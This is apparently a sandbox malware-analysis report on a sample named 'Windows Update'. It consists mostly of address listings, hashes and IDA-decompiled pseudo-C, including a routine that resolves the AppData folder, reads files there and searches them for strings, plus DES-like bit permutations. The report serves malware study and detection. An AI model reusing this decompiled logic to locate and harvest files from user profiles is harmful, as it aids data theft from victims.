                                                                                                                    0x0007af5e
                                                                                                                    0x0007acc3
                                                                                                                    0x0007acc7
                                                                                                                    0x0007accd
                                                                                                                    0x0007accf
                                                                                                                    0x00000000
                                                                                                                    0x0007acd5
                                                                                                                    0x0007acd9
                                                                                                                    0x0007acdf
                                                                                                                    0x0007ace1
                                                                                                                    0x00000000
                                                                                                                    0x0007ace7
                                                                                                                    0x0007ace7
                                                                                                                    0x0007acea
                                                                                                                    0x0007acec
                                                                                                                    0x0007acee
                                                                                                                    0x0007ad5e
                                                                                                                    0x0007ad60
                                                                                                                    0x0007ad67
                                                                                                                    0x0007ad69
                                                                                                                    0x0007ad6f
                                                                                                                    0x0007ad72
                                                                                                                    0x0007ada1
                                                                                                                    0x0007ada3
                                                                                                                    0x0007ada9
                                                                                                                    0x0007adab
                                                                                                                    0x0007adac
                                                                                                                    0x0007adae
                                                                                                                    0x0007ad74
                                                                                                                    0x0007ad74
                                                                                                                    0x0007ad75
                                                                                                                    0x0007ad7b
                                                                                                                    0x0007ad7d
                                                                                                                    0x00000000
                                                                                                                    0x0007ad7f
                                                                                                                    0x0007ad85
                                                                                                                    0x0007ad8c
                                                                                                                    0x0007ad93
                                                                                                                    0x0007ad96
                                                                                                                    0x0007ad98
                                                                                                                    0x0007ad9a
                                                                                                                    0x0007ad9d
                                                                                                                    0x0007ad9d
                                                                                                                    0x0007ad7d
                                                                                                                    0x0007adb6
                                                                                                                    0x0007adbb
                                                                                                                    0x0007adbd
                                                                                                                    0x0007adbf
                                                                                                                    0x0007adc1
                                                                                                                    0x0007adc4
                                                                                                                    0x0007adc7
                                                                                                                    0x0007adc9
                                                                                                                    0x0007adc9
                                                                                                                    0x0007adcc
                                                                                                                    0x0007adce
                                                                                                                    0x0007add0
                                                                                                                    0x0007add1
                                                                                                                    0x0007add2
                                                                                                                    0x0007addc
                                                                                                                    0x0007adde
                                                                                                                    0x0007ade1
                                                                                                                    0x0007ade5
                                                                                                                    0x0007ade9
                                                                                                                    0x0007adee
                                                                                                                    0x0007adf1
                                                                                                                    0x0007adf3
                                                                                                                    0x0007adf5
                                                                                                                    0x0007adf8
                                                                                                                    0x0007adfb
                                                                                                                    0x0007adfe
                                                                                                                    0x0007adfe
                                                                                                                    0x0007ae01
                                                                                                                    0x0007ae03
                                                                                                                    0x0007ae05
                                                                                                                    0x0007ae06
                                                                                                                    0x0007ae07
                                                                                                                    0x0007ae11
                                                                                                                    0x0007ae13
                                                                                                                    0x0007ae16
                                                                                                                    0x0007ae1a
                                                                                                                    0x0007ae1e
                                                                                                                    0x0007ae23
                                                                                                                    0x0007ae26
                                                                                                                    0x0007ae28
                                                                                                                    0x0007ae2a
                                                                                                                    0x0007ae2d
                                                                                                                    0x0007ae30
                                                                                                                    0x0007ae33
                                                                                                                    0x0007ae33
                                                                                                                    0x0007ae36
                                                                                                                    0x0007ae38
                                                                                                                    0x0007ae3a
                                                                                                                    0x0007ae3b
                                                                                                                    0x0007ae3c
                                                                                                                    0x0007ae41
                                                                                                                    0x0007ae43
                                                                                                                    0x0007ae45
                                                                                                                    0x0007ae72
                                                                                                                    0x0007ae7a
                                                                                                                    0x0007ae7d
                                                                                                                    0x0007ae80
                                                                                                                    0x0007ae83
                                                                                                                    0x0007ae86
                                                                                                                    0x0007ae89
                                                                                                                    0x0007ae8b
                                                                                                                    0x00000000
                                                                                                                    0x0007ae8d
                                                                                                                    0x0007ae90
                                                                                                                    0x0007ae93
                                                                                                                    0x0007ae99
                                                                                                                    0x0007ae9c
                                                                                                                    0x0007ae9f
                                                                                                                    0x0007ae9f
                                                                                                                    0x0007ae47
                                                                                                                    0x0007ae47
                                                                                                                    0x0007ae4d
                                                                                                                    0x0007ae54
                                                                                                                    0x0007ae55
                                                                                                                    0x0007ae58
                                                                                                                    0x0007ae58
                                                                                                                    0x0007ae58
                                                                                                                    0x0007ae5b
                                                                                                                    0x0007ae5e
                                                                                                                    0x0007ae5e
                                                                                                                    0x0007ae5e
                                                                                                                    0x0007ae5e
                                                                                                                    0x0007ae49
                                                                                                                    0x0007ae49
                                                                                                                    0x0007ae4b
                                                                                                                    0x0007ae68
                                                                                                                    0x0007ae6a
                                                                                                                    0x0007ae6c
                                                                                                                    0x00000000
                                                                                                                    0x0007ae6e
                                                                                                                    0x0007ae6e
                                                                                                                    0x0007ae70
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0007ae70
                                                                                                                    0x0007ae6c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0007ae4b
                                                                                                                    0x0007ae47
                                                                                                                    0x00000000
                                                                                                                    0x0007ae45
                                                                                                                    0x0007acf0
                                                                                                                    0x0007acf0
                                                                                                                    0x0007acfa
                                                                                                                    0x0007acfd
                                                                                                                    0x0007ad04
                                                                                                                    0x0007ad07
                                                                                                                    0x0007ad0a
                                                                                                                    0x0007ad0d
                                                                                                                    0x0007ad14
                                                                                                                    0x0007ad16
                                                                                                                    0x0007ad1c
                                                                                                                    0x0007ad1f
                                                                                                                    0x0007ae61
                                                                                                                    0x0007ae61
                                                                                                                    0x0007ad25
                                                                                                                    0x0007ad25
                                                                                                                    0x0007ad26
                                                                                                                    0x0007ad2c
                                                                                                                    0x0007ad2e
                                                                                                                    0x00000000
                                                                                                                    0x0007ad34
                                                                                                                    0x0007ad37
                                                                                                                    0x0007ad38
                                                                                                                    0x0007ad3f
                                                                                                                    0x0007ad43
                                                                                                                    0x0007ad4a
                                                                                                                    0x0007ad4c
                                                                                                                    0x0007ad52
                                                                                                                    0x00000000
                                                                                                                    0x0007ad52
                                                                                                                    0x0007ad4c
                                                                                                                    0x0007ad2e
                                                                                                                    0x0007ad1f
                                                                                                                    0x0007acf2
                                                                                                                    0x0007acf2
                                                                                                                    0x0007acf8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0007acf8
                                                                                                                    0x0007acf0
                                                                                                                    0x00000000
                                                                                                                    0x0007acee
                                                                                                                    0x0007ace1
                                                                                                                    0x0007accf
                                                                                                                    0x0007aca2
                                                                                                                    0x0007aca2
                                                                                                                    0x00000000
                                                                                                                    0x0007aca4
                                                                                                                    0x0007aca4
                                                                                                                    0x0007acaa
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0007acaa
                                                                                                                    0x0007aca2
                                                                                                                    0x0007ac88
                                                                                                                    0x0007ac88
                                                                                                                    0x0007ac8e
                                                                                                                    0x0007ac8e
                                                                                                                    0x0007ac95
                                                                                                                    0x0007ac96
                                                                                                                    0x00000000
                                                                                                                    0x0007ac8a
                                                                                                                    0x0007ac8a
                                                                                                                    0x0007ac8c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0007ac8c
                                                                                                                    0x0007ac88
                                                                                                                    0x0007ac86
                                                                                                                    0x0007ac56
                                                                                                                    0x0007ac56
                                                                                                                    0x0007ac56
                                                                                                                    0x0007ac5d
                                                                                                                    0x0007ac5e
                                                                                                                    0x0007ac60
                                                                                                                    0x0007ac65
                                                                                                                    0x0007ac65
                                                                                                                    0x0007ac67
                                                                                                                    0x0007ac6b
                                                                                                                    0x0007ac6b

                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 0007AC74
                                                                                                                      • Part of subcall function 0007C705: __getptd_noexit.LIBCMT ref: 0007C705
                                                                                                                    • __gmtime64_s.LIBCMT ref: 0007AD0D
                                                                                                                    • __gmtime64_s.LIBCMT ref: 0007AD43
                                                                                                                    • __gmtime64_s.LIBCMT ref: 0007AD60
                                                                                                                    • __allrem.LIBCMT ref: 0007ADB6
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0007ADD2
                                                                                                                    • __allrem.LIBCMT ref: 0007ADE9
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0007AE07
                                                                                                                    • __allrem.LIBCMT ref: 0007AE1E
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0007AE3C
                                                                                                                    • __invoke_watson.LIBCMT ref: 0007AEAD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 384356119-0
                                                                                                                    • Opcode ID: 061e06230a02595ce45d74f4eee52ed1261026100781bc018d12ab560f8f8926
                                                                                                                    • Instruction ID: d64c2b208777654b934b655bb5c8619604c0a0eedcc6229454387d3b9939b127
                                                                                                                    • Opcode Fuzzy Hash: 061e06230a02595ce45d74f4eee52ed1261026100781bc018d12ab560f8f8926
                                                                                                                    • Instruction Fuzzy Hash: 4A71D972F00716ABD715AE68CC81BAE73E4AF95324F14C129F418D7682E778DD408B9A
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0001F737 Relevance: 13.7, APIs: 9, Instructions: 237COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 67%
                                                                                                                    			E0001F737(intOrPtr _a4) {
				signed int _v8;
				char _v267;
				char _v268;
				char _v524;
				char _v1044;
				char _v2068;
				signed int _v2072;
				intOrPtr _v2084;
				intOrPtr _v2088;
				intOrPtr _v2092;
				signed int* _v2096;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t55;
				signed int _t71;
				signed int _t74;
				signed int _t76;
				signed int _t83;
				signed int _t85;
				char _t86;
				signed int _t91;
				signed int _t96;
				signed int _t101;
				signed int _t106;
				signed int _t118;
				signed int _t123;
				signed int _t128;
				signed int _t133;
				signed int _t136;
				intOrPtr* _t138;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				signed int _t144;
				signed int _t154;
				signed int _t158;
				void* _t160;
				intOrPtr* _t161;
				intOrPtr* _t166;
				void* _t168;
				signed int _t172;
				signed int _t176;
				signed int _t178;
				intOrPtr* _t179;
				signed int _t180;
				signed int _t183;
				void* _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				signed int _t194;
				void* _t195;
				intOrPtr* _t196;
				signed int* _t198;
				void* _t199;
				signed int _t201;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				void* _t211;
				intOrPtr* _t212;
				signed int _t214;
				void* _t216;
				void* _t217;
				void* _t218;
				void* _t219;
				void* _t220;
				void* _t222;
				void* _t223;
				void* _t224;
				void* _t226;

				_v8 =  *0x481f80 ^ _t214;
				_v268 = 0;
				E00077C87( &_v267, 0, 0x103);
				_t217 = _t216 + 0xc;
				_t197 = 0;
				_t200 = 0;
				_t55 =  &_v524;
				if(_a4 != 0xf) {
					_push(0x471000);
				} else {
					_push(0x470fec);
				}
				_push(0x100);
				_push(_t55);
				E00077AF9();
				_t218 = _t217 + 0xc;
				_push( &_v268);
				_push(0);
				_push(0);
				_push(0x1a);
				_push(0);
				if( *0x470200() == 0) {
					E00077AF9( &_v1044, 0x208,  &_v268);
					E00077B4E( &_v1044, 0x208, 0x470790);
					E00077B4E( &_v1044, 0x208,  &_v524);
					E00077B4E( &_v1044, 0x208, 0x471010);
					_v2072 = _t200;
					_t71 = E0007928A( &_v2072,  &_v1044, 0x470890);
					_t219 = _t218 + 0x3c;
					__eflags = _t71;
					if(_t71 != 0) {
						goto L5;
					} else {
						_t74 = _v2072;
						__eflags = _t74;
						if(__eflags == 0) {
							goto L5;
						} else {
							_push(_t74);
							_push(0x400);
							_push( &_v2068);
							_t76 = E00079087(_t160, _t197, _t200, __eflags);
							_t220 = _t219 + 0xc;
							__eflags = _t76;
							if(__eflags == 0) {
								L30:
								E00079010(_t160, _t197, _t200, __eflags);
								__eflags = _v8 ^ _t214;
								return E000772F2(_t197, _t160, _v8 ^ _t214, _t183, _t197, _t200, _v2072);
							} else {
								do {
									E00078317( &_v2068, 0x400);
									_t222 = _t220 + 8;
									__eflags = _t200;
									if(_t200 != 0) {
										_t83 = E00078487( &_v2068, 0x471030);
										_t223 = _t222 + 8;
										__eflags = _t83;
										if(__eflags != 0) {
											_t85 = E00078487( &_v2068, 0x471038);
											_t224 = _t223 + 8;
											__eflags = _t85;
											if(_t85 != 0) {
												 *_t85 = 0x5c;
											}
											_t166 =  &_v2068;
											_t184 = _t166 + 1;
											do {
												_t86 =  *_t166;
												_t166 = _t166 + 1;
												__eflags = _t86;
											} while (_t86 != 0);
											_t168 = _t166 - _t184 - 1;
											__eflags = _t168 - 0x400;
											if(_t168 >= 0x400) {
												L00077EEC();
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												_push(_t214);
												_push(_t200);
												_push(_t197);
												_t198 = _v2096;
												_t201 = _t198[1];
												_t185 =  *_t198;
												_t91 = (_t201 >> 0x00000004 ^ _t185) & 0x0f0f0f0f;
												_t186 = _t185 ^ _t91;
												_t202 = _t201 ^ _t91 << 0x00000004;
												_t96 = (_t186 >> 0x00000010 ^ _t202) & 0x0000ffff;
												_t203 = _t202 ^ _t96;
												_t187 = _t186 ^ _t96 << 0x00000010;
												_t101 = (_t203 >> 0x00000002 ^ _t187) & 0x33333333;
												_t188 = _t187 ^ _t101;
												_t204 = _t203 ^ _t101 << 0x00000002;
												_t106 = (_t188 >> 0x00000008 ^ _t204) & 0x00ff00ff;
												_t205 = _t204 ^ _t106;
												_t189 = _t188 ^ _t106 << 0x00000008;
												_t172 = (_t205 >> 0x00000001 ^ _t189) & 0x55555555;
												 *_t198 = _t172 ^ _t189;
												_t198[1] = _t172 + _t172 ^ _t205;
												L0001FFF7(_t198, _v2084, 0);
												L0001FFF7(_t198, _v2088, 1);
												L0001FFF7(_t198, _v2092, 0);
												_t206 = _t198[1];
												_t190 =  *_t198;
												_t118 = (_t206 >> 0x00000001 ^ _t190) & 0x55555555;
												_t191 = _t190 ^ _t118;
												_t207 = _t206 ^ _t118 + _t118;
												_t123 = (_t191 >> 0x00000008 ^ _t207) & 0x00ff00ff;
												_t208 = _t207 ^ _t123;
												_t192 = _t191 ^ _t123 << 0x00000008;
												_t128 = (_t208 >> 0x00000002 ^ _t192) & 0x33333333;
												_t193 = _t192 ^ _t128;
												_t209 = _t208 ^ _t128 << 0x00000002;
												_t133 = (_t193 >> 0x00000010 ^ _t209) & 0x0000ffff;
												_t210 = _t209 ^ _t133;
												_t194 = _t193 ^ _t133 << 0x00000010;
												_t176 = (_t210 >> 0x00000004 ^ _t194) & 0x0f0f0f0f;
												_t136 = _t176 ^ _t194;
												_t178 = _t176 << 0x00000004 ^ _t210;
												__eflags = _t178;
												 *_t198 = _t136;
												_t198[1] = _t178;
												return _t136;
											} else {
												_push(_t160);
												 *((char*)(_t214 + _t168 - 0x810)) = _t86;
												_t138 = E00078487( &_v2068, 0x47103c);
												_t179 =  &_v268;
												_t226 = _t224 + 8;
												_t161 = _t138;
												_t32 = _t179 + 1; // 0x1
												_t195 = _t32;
												do {
													_t139 =  *_t179;
													_t179 = _t179 + 1;
													__eflags = _t139;
												} while (_t139 != 0);
												_t180 = _t179 - _t195;
												__eflags = _t180;
												_t196 =  &_v524;
												_t211 = _t196 + 1;
												do {
													_t140 =  *_t196;
													_t196 = _t196 + 1;
													__eflags = _t140;
												} while (_t140 != 0);
												_t183 = _t196 - _t211;
												__eflags = _t183;
												_t212 = _t161;
												_t35 = _t212 + 1; // 0x1
												_t199 = _t35;
												do {
													_t141 =  *_t212;
													_t212 = _t212 + 1;
													__eflags = _t141;
												} while (_t141 != 0);
												_t36 = _t180 + 3; // 0x4
												_t200 = _t212 - _t199 + _t36 + _t183;
												_t144 = E00077BCE(_t161, _t199, _t212 - _t199 + _t36 + _t183);
												_t197 = _t144;
												_t220 = _t226 + 4;
												__eflags = _t144;
												if(__eflags != 0) {
													E00077AF9(_t197, _t200,  &_v268);
													E00077B4E(_t197, _t200, 0x470790);
													E00077B4E(_t197, _t200,  &_v524);
													E00077B4E(_t197, _t200, 0x470790);
													_t39 = _t161 + 1; // 0x1
													E00077B4E(_t197, _t200, _t39);
													_t220 = _t220 + 0x3c;
												}
												_pop(_t160);
												goto L30;
											}
										} else {
											goto L14;
										}
									} else {
										_t158 = E00078487( &_v2068, 0x471020);
										_t223 = _t222 + 8;
										__eflags = _t158;
										if(__eflags != 0) {
											_t200 = 1;
										}
										goto L14;
									}
									goto L33;
									L14:
									_push(_v2072);
									_push(0x400);
									_push( &_v2068);
									_t154 = E00079087(_t160, _t197, _t200, __eflags);
									_t220 = _t223 + 0xc;
									__eflags = _t154;
								} while (__eflags != 0);
								E00079010(_t160, _t197, _t200, __eflags);
								__eflags = _v8 ^ _t214;
								return E000772F2(_t197, _t160, _v8 ^ _t214, _t183, _t197, _t200, _v2072);
							}
						}
					}
				} else {
					 *0x470124();
					L5:
					return E000772F2(0, _t160, _v8 ^ _t214, _t183, _t197, _t200);
				}
				L33:
			}
























































































                                                                                                                    0x0001f747
                                                                                                                    0x0001f75a
                                                                                                                    0x0001f761
                                                                                                                    0x0001f766
                                                                                                                    0x0001f769
                                                                                                                    0x0001f76b
                                                                                                                    0x0001f771
                                                                                                                    0x0001f777
                                                                                                                    0x0001f780
                                                                                                                    0x0001f779
                                                                                                                    0x0001f779
                                                                                                                    0x0001f779
                                                                                                                    0x0001f785
                                                                                                                    0x0001f78a
                                                                                                                    0x0001f78b
                                                                                                                    0x0001f790
                                                                                                                    0x0001f799
                                                                                                                    0x0001f79a
                                                                                                                    0x0001f79c
                                                                                                                    0x0001f79e
                                                                                                                    0x0001f7a0
                                                                                                                    0x0001f7aa
                                                                                                                    0x0001f7d7
                                                                                                                    0x0001f7ed
                                                                                                                    0x0001f805
                                                                                                                    0x0001f81b
                                                                                                                    0x0001f833
                                                                                                                    0x0001f839
                                                                                                                    0x0001f83e
                                                                                                                    0x0001f841
                                                                                                                    0x0001f843
                                                                                                                    0x00000000
                                                                                                                    0x0001f849
                                                                                                                    0x0001f849
                                                                                                                    0x0001f84f
                                                                                                                    0x0001f851
                                                                                                                    0x00000000
                                                                                                                    0x0001f857
                                                                                                                    0x0001f857
                                                                                                                    0x0001f85e
                                                                                                                    0x0001f863
                                                                                                                    0x0001f864
                                                                                                                    0x0001f869
                                                                                                                    0x0001f86c
                                                                                                                    0x0001f86e
                                                                                                                    0x0001f9e9
                                                                                                                    0x0001f9ef
                                                                                                                    0x0001f9fd
                                                                                                                    0x0001fa08
                                                                                                                    0x0001f877
                                                                                                                    0x0001f877
                                                                                                                    0x0001f883
                                                                                                                    0x0001f888
                                                                                                                    0x0001f891
                                                                                                                    0x0001f893
                                                                                                                    0x0001f8b4
                                                                                                                    0x0001f8b9
                                                                                                                    0x0001f8bc
                                                                                                                    0x0001f8be
                                                                                                                    0x0001f90a
                                                                                                                    0x0001f90f
                                                                                                                    0x0001f912
                                                                                                                    0x0001f914
                                                                                                                    0x0001f916
                                                                                                                    0x0001f916
                                                                                                                    0x0001f919
                                                                                                                    0x0001f91f
                                                                                                                    0x0001f927
                                                                                                                    0x0001f927
                                                                                                                    0x0001f929
                                                                                                                    0x0001f92a
                                                                                                                    0x0001f92a
                                                                                                                    0x0001f930
                                                                                                                    0x0001f931
                                                                                                                    0x0001f937
                                                                                                                    0x0001fa09
                                                                                                                    0x0001fa0e
                                                                                                                    0x0001fa0f
                                                                                                                    0x0001fa10
                                                                                                                    0x0001fa11
                                                                                                                    0x0001fa12
                                                                                                                    0x0001fa13
                                                                                                                    0x0001fa14
                                                                                                                    0x0001fa15
                                                                                                                    0x0001fa16
                                                                                                                    0x0001fa17
                                                                                                                    0x0001fa1a
                                                                                                                    0x0001fa1b
                                                                                                                    0x0001fa1c
                                                                                                                    0x0001fa21
                                                                                                                    0x0001fa24
                                                                                                                    0x0001fa2d
                                                                                                                    0x0001fa32
                                                                                                                    0x0001fa37
                                                                                                                    0x0001fa40
                                                                                                                    0x0001fa45
                                                                                                                    0x0001fa4a
                                                                                                                    0x0001fa53
                                                                                                                    0x0001fa58
                                                                                                                    0x0001fa5d
                                                                                                                    0x0001fa69
                                                                                                                    0x0001fa6e
                                                                                                                    0x0001fa73
                                                                                                                    0x0001fa7b
                                                                                                                    0x0001fa85
                                                                                                                    0x0001fa8d
                                                                                                                    0x0001fa90
                                                                                                                    0x0001fa9b
                                                                                                                    0x0001faa6
                                                                                                                    0x0001faab
                                                                                                                    0x0001faae
                                                                                                                    0x0001fab6
                                                                                                                    0x0001fabb
                                                                                                                    0x0001fabf
                                                                                                                    0x0001fac8
                                                                                                                    0x0001facd
                                                                                                                    0x0001fad2
                                                                                                                    0x0001fadb
                                                                                                                    0x0001fae0
                                                                                                                    0x0001fae5
                                                                                                                    0x0001faf1
                                                                                                                    0x0001faf6
                                                                                                                    0x0001fafb
                                                                                                                    0x0001fb04
                                                                                                                    0x0001fb0c
                                                                                                                    0x0001fb11
                                                                                                                    0x0001fb11
                                                                                                                    0x0001fb13
                                                                                                                    0x0001fb15
                                                                                                                    0x0001fb1b
                                                                                                                    0x0001f93d
                                                                                                                    0x0001f93d
                                                                                                                    0x0001f93e
                                                                                                                    0x0001f951
                                                                                                                    0x0001f956
                                                                                                                    0x0001f95c
                                                                                                                    0x0001f95f
                                                                                                                    0x0001f961
                                                                                                                    0x0001f961
                                                                                                                    0x0001f967
                                                                                                                    0x0001f967
                                                                                                                    0x0001f969
                                                                                                                    0x0001f96a
                                                                                                                    0x0001f96a
                                                                                                                    0x0001f96e
                                                                                                                    0x0001f96e
                                                                                                                    0x0001f970
                                                                                                                    0x0001f976
                                                                                                                    0x0001f979
                                                                                                                    0x0001f979
                                                                                                                    0x0001f97b
                                                                                                                    0x0001f97c
                                                                                                                    0x0001f97c
                                                                                                                    0x0001f980
                                                                                                                    0x0001f980
                                                                                                                    0x0001f982
                                                                                                                    0x0001f984
                                                                                                                    0x0001f984
                                                                                                                    0x0001f987
                                                                                                                    0x0001f987
                                                                                                                    0x0001f989
                                                                                                                    0x0001f98a
                                                                                                                    0x0001f98a
                                                                                                                    0x0001f98e
                                                                                                                    0x0001f995
                                                                                                                    0x0001f998
                                                                                                                    0x0001f99d
                                                                                                                    0x0001f99f
                                                                                                                    0x0001f9a2
                                                                                                                    0x0001f9a4
                                                                                                                    0x0001f9af
                                                                                                                    0x0001f9bb
                                                                                                                    0x0001f9c9
                                                                                                                    0x0001f9d5
                                                                                                                    0x0001f9da
                                                                                                                    0x0001f9e0
                                                                                                                    0x0001f9e5
                                                                                                                    0x0001f9e5
                                                                                                                    0x0001f9e8
                                                                                                                    0x00000000
                                                                                                                    0x0001f9e8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0001f895
                                                                                                                    0x0001f89b
                                                                                                                    0x0001f8a0
                                                                                                                    0x0001f8a3
                                                                                                                    0x0001f8a5
                                                                                                                    0x0001f8a7
                                                                                                                    0x0001f8a7
                                                                                                                    0x00000000
                                                                                                                    0x0001f8a5
                                                                                                                    0x00000000
                                                                                                                    0x0001f8c0
                                                                                                                    0x0001f8c0
                                                                                                                    0x0001f8cc
                                                                                                                    0x0001f8d1
                                                                                                                    0x0001f8d2
                                                                                                                    0x0001f8d7
                                                                                                                    0x0001f8da
                                                                                                                    0x0001f8da
                                                                                                                    0x0001f8e4
                                                                                                                    0x0001f8f3
                                                                                                                    0x0001f8fd
                                                                                                                    0x0001f8fd
                                                                                                                    0x0001f86e
                                                                                                                    0x0001f851
                                                                                                                    0x0001f7ac
                                                                                                                    0x0001f7ac
                                                                                                                    0x0001f7b3
                                                                                                                    0x0001f7c3
                                                                                                                    0x0001f7c3
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _strstr$_fgets$__wfopen_s_malloc_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2443066643-0
                                                                                                                    • Opcode ID: cbc4664109ca34017ed911d0200bcaa0e92c1a35e4de850bbb2a854da42b782f
                                                                                                                    • Instruction ID: 0795b644d71ba840272f0d414bcf3ab6df7b3e379a2d6ea1b5127ac54749497c
                                                                                                                    • Opcode Fuzzy Hash: cbc4664109ca34017ed911d0200bcaa0e92c1a35e4de850bbb2a854da42b782f
                                                                                                                    • Instruction Fuzzy Hash: 0D710871D0421D6ADB20EA648C46FFE73ACAF05344F14C0B5F98CE6043EE759AC58BA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 000A376C Relevance: 13.7, APIs: 9, Instructions: 236COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 43%
                                                                                                                    			E000A376C() {
				signed int _v8;
				signed int _v12;
				char _v20;
				char _v279;
				char _v280;
				char _v800;
				char _v1036;
				char _v1824;
				signed int _v1828;
				signed int _v1848;
				intOrPtr _v1852;
				signed int _v1864;
				char _v2060;
				char _v3084;
				char _v4108;
				char _v5132;
				char _v10132;
				char _v10136;
				intOrPtr _v10140;
				signed int _v10144;
				char _v10148;
				signed int _v10152;
				char _v11992;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t235;
				signed int _t238;
				signed int _t240;
				signed int _t247;
				signed int _t249;
				char _t250;
				signed int _t258;
				signed int _t262;
				signed int _t266;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t287;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t308;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t346;
				signed int _t350;
				signed int _t352;
				char _t356;
				signed int _t357;
				signed int _t369;
				signed int _t378;
				signed int _t387;
				intOrPtr* _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t409;
				signed int _t419;
				signed int _t423;
				void* _t425;
				intOrPtr* _t426;
				intOrPtr* _t431;
				void* _t433;
				intOrPtr* _t435;
				intOrPtr* _t437;
				intOrPtr* _t439;
				intOrPtr* _t441;
				intOrPtr* _t445;
				intOrPtr* _t457;
				signed int _t458;
				signed int _t461;
				void* _t462;
				void* _t465;
				void* _t466;
				void* _t467;
				void* _t468;
				intOrPtr* _t469;
				void* _t472;
				void* _t473;
				intOrPtr* _t474;
				void* _t475;
				void* _t476;
				void* _t477;
				void* _t480;
				void* _t481;
				signed int _t483;
				signed int _t485;
				signed int _t487;
				void* _t490;
				void* _t491;
				intOrPtr* _t492;
				void* _t494;
				signed int _t495;
				signed int _t496;
				void* _t497;
				void* _t498;
				void* _t499;
				void* _t500;
				void* _t502;
				void* _t503;
				signed int _t504;
				void* _t505;
				void* _t507;

				_v8 =  *0x482960 ^ _t495;
				_v280 = 0;
				L000FCE0C( &_v279, 0, 0x103);
				asm("movq xmm0, [0x4751f0]");
				_t498 = _t497 + 0xc;
				_v12 =  *0x4751f8;
				_push( &_v280);
				_t479 = 0;
				_push(0);
				_push(0);
				_push(0x1a);
				_push(0);
				asm("movq [ebp-0x10], xmm0");
				_t471 = 0;
				if( *0x47421c() >= 0) {
					E000FC711( &_v800, 0x208,  &_v280);
					E000FC766( &_v800, 0x208, 0x474d84);
					E000FC766( &_v800, 0x208,  &_v20);
					E000FC766( &_v800, 0x208, 0x4751fc);
					_v1828 = 0;
					_t235 = E000FDB99( &_v1828,  &_v800, 0x474658);
					_t499 = _t498 + 0x3c;
					__eflags = _t235;
					if(_t235 != 0) {
						goto L2;
					} else {
						_t238 = _v1828;
						__eflags = _t238;
						if(__eflags == 0) {
							goto L2;
						} else {
							_push(_t238);
							_push(0x400);
							_push( &_v1824);
							_t240 = E000FD996(_t425, 0, 0, __eflags);
							_t500 = _t499 + 0xc;
							__eflags = _t240;
							if(__eflags == 0) {
								L27:
								_push(_v1828);
								E000FD91F(_t425, _t471, _t479, __eflags);
								_pop(_t473);
								__eflags = _v8 ^ _t495;
								_pop(_t481);
								return L000FBE87(_t471, _t425, _v8 ^ _t495, _t461, _t473, _t481);
							} else {
								goto L7;
								L11:
								_push(_v1828);
								_push(0x400);
								_push( &_v1824);
								_t419 = E000FD996(_t425, _t471, _t479, __eflags);
								_t500 = _t503 + 0xc;
								__eflags = _t419;
								if(__eflags != 0) {
									L7:
									E000FCA6C( &_v1824, 0x400);
									_t502 = _t500 + 8;
									__eflags = _t479;
									if(_t479 != 0) {
										goto L10;
									} else {
										_t423 = E000FCABC( &_v1824, 0x47520c);
